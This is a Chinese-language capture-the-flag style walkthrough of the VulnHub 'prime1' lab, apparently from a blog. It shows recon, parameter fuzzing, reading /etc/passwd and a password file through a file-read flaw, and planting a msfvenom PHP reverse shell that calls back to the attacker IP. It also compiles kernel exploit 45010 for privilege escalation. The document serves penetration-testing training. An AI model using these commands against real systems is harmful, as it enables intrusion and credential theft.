prime1--vulnhub靶场通关教程

一. 信息收集

1. 探测目标主机IP地址

arp-scan -l  //查看网段

vm  编辑--查看虚拟网络编辑器,看到靶机的网段

网段是: 192.168.83.0

是c段网络

2. 全面检测目标IP

nmap -sP 192.168.83.1/24

靶机ip是:

192.168.83.145

攻击机的ip是:

192.168.83.136

3.扫描端口

端口和服务是对应关系的根据计算机网络的应用层协议

扫描端口

nmap -p 1-65535 -A 192.168.83.145

看到了22端口--ssh协议 和80端口--http服务打开

访问页面

4.目录扫描

dirb http://192.168.83.145

得到信息常见字典:/usr/share/dirb/wordlists/common.txt

查看字典内容:less /usr/share/dirb/wordlists/common.txt

还看到了wordpress的信息这个是个人博客搭建的常用方式

还有个dev的信息看不懂可能存在有用信息

知识点:

curl 是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。它经常用于发送请求到 Web 服务器并获取响应,或者用于自动化脚本和文件传输。

curl http://192.168.83.145/dev

译文:

你好,

现在你处于0级阶段。

在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。

祝你黑客行动愉快。

5.扫描文件名后缀为.txt

dirb操作-X指定文件后缀,对.txt,.cfg等文件后缀中存放有用的信息

man dirb 操作指令书

dirb http://192.168.83.145 -X .txt,.php,.zip

扫到了secret.txt

查看内容

curl http://192.168.83.145/secret.txt

译文:看起来你得到了一些秘密。

好吧,我只是想帮你一下。

对你找到的每个PHP页面进行更多的模糊测试。如果你得到了任何正确的参数,就按照下面的步骤操作。如果你还是卡住了,
那就从这里学习一个对OSCP很有用的基础工具。

Fuzzing/Fuzz_For_Web at master · hacknpentest/Fuzzing · GitHub

//查看location.txt文件,你将得到下一步的行动指示//

注意:kali是自带fuzz的工具的 z

二. 渗透过程

1.爆破参数

页面index.php,参数para,访问文件location.php

Wfuzz -w  /usr/share/dirb/wordlists/common.txt http://192.168.83.145/index.php?FUZZ

得到4614返回参数包

wfuzz -w /usr/share/dirb/wordlists/common.txt --hw 12 http://192.168.83.145/index.php?FUZZ

过滤掉返回参数为200个字的得到参数file

2.读取文件

看到file参数想到文件读取

curl http://192.168.83.145/index.php?file=location.txt

读取内容

翻译

hnp security 做得更出色一些
好的,现在你找到了确切的参数
现在继续深入挖掘下一个参数
在其他的PHP页面上使用'secrettier360'参数,会有更多乐趣。

curl http://192.168.83.145/image.php?secrettier360

Image.php是之前dirb扫到的

读取敏感文件(Linux系统)

密码:/etc/passwd

配置 /etc/my.ini

查看 /etc/passwd

curl http://192.168.83.145/image.php?secrettier360=/etc/passwd

curl http://192.168.83.145/image.php?secrettier360=/home/saket/password.txt

读取密码

密码是:   follow_the_ippsec

之前扫到了ssh,http wordpress,那密码对应的是什么服务呢

尝试:

ssh -p 22 victor@192.168.83.145

登录失败了

3.Wordpress登录尝试

wpscan --url http://192.168.83.145/wordpress/ --enumerate u  

扫描用户

wordepress登录

登录成功了

在主题编辑器提权

找到可以上传php代码的界面了

4.反弹shell控制靶机

Msf:漏洞库、攻击脚本、提权脚本

Msf生成反弹链接的 payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.83.136 lport=7777 -o shell.php

生成php反弹shell脚本

注意ip地址是攻击机和端口设置

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.83.136

lhost => 192.168.83.136

msf6 exploit(multi/handler) > set lport 7777

lport => 7777

msf6 exploit(multi/handler) > exploit

开始监听监听

访问页面

http://192.168.83.145/wordpress/wp-content/themes/twentynineteen/secret.php

监听成功拿到权限

三. Linux提权

1. 确定操作系统信息

Sysinfo

2. 搜索操作系统漏洞

继续使用searchsploit工具搜索漏洞 ,打开另一个终端

searchsploit Ubuntu 16.04

searchsploit简介

漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法

查到对应版本的漏洞

Privilege Escalation(提权),这里我们使用通用4.4.x版本的提权方式,完整path

这个文件路径记一下比较好

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

复制漏洞到当前文件夹中

gcc 45010.c -o 45010

编译提权脚本

切换到meterpreter终端即再打开一个msf

upload /home/kali/Desktop/45010 /tmp/45010

上传到/tmp目录下

添加执行的权限

Chmod +x 45010

./45010执行

拿到权限了

不知道为什么执行c文件失败了就差最后一步了可惜

  • 26
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值